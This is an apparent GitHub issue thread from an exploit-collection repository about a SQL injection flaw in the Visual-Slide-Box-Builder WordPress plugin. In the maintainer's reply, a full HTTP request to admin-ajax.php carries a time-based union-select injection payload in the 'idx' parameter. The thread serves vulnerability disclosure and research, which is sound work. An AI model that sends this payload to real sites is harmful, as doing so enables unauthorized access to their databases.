nu11secur1ty / CVE-nu11secur1ty

50 stars 23 forks source link

Visual-Slide-Box-Builder-plugin exploit #1

Closed Phoenix1112 closed 2 years ago

Phoenix1112 commented 2 years ago

hello. thanks for this project. i dont understand.. Is the Visual-Slide-Box-Builder-plugin vulnerability an authorized vulnerability? If an unauthorized user is exploiting this vulnerability, on which page exactly is the "idx" parameter located?

nu11secur1ty commented 2 years ago

Hello, the URL + parameter:

GET /wordpress/wp-admin/admin-ajax.php?action=vsbb_get_one&idx=1%20union%20select%201,2,3,4,5,sleep(3) HTTP/1.1\n

Thank you for your response, and BR